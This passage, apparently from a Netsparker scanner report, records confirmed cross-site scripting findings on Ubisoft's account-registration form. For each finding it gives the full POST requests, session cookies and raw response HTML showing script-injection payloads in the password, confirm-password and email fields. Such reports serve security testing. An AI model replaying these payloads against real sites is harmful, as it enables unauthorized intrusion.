<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST '"--></style></script><script>alert(0x0004C2)</script>
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST 3
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit POST 3
m_ImageButtonCancel POST 3

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 349
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004C2)%3c%2fscript%3e&confirmpassword=3&email=netsparker%40example.com&birthdate=3&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit=3&m_ImageButtonCancel=3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0004C2)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST '"--></style></script><script>alert(0x0004D0)</script>
email POST netsparker@example.com
birthdate POST 3
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit POST 3
m_ImageButtonCancel POST 3

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 349
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D0)%3c%2fscript%3e&email=netsparker%40example.com&birthdate=3&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit=3&m_ImageButtonCancel=3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0004D0)</script>" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST 3
email POST '"--></style></script><script>alert(0x0004DB)</script>
birthdate POST 3
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit POST 3
m_ImageButtonCancel POST 3

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 326
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004DB)%3c%2fscript%3e&birthdate=3&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit=3&m_ImageButtonCancel=3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39976


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
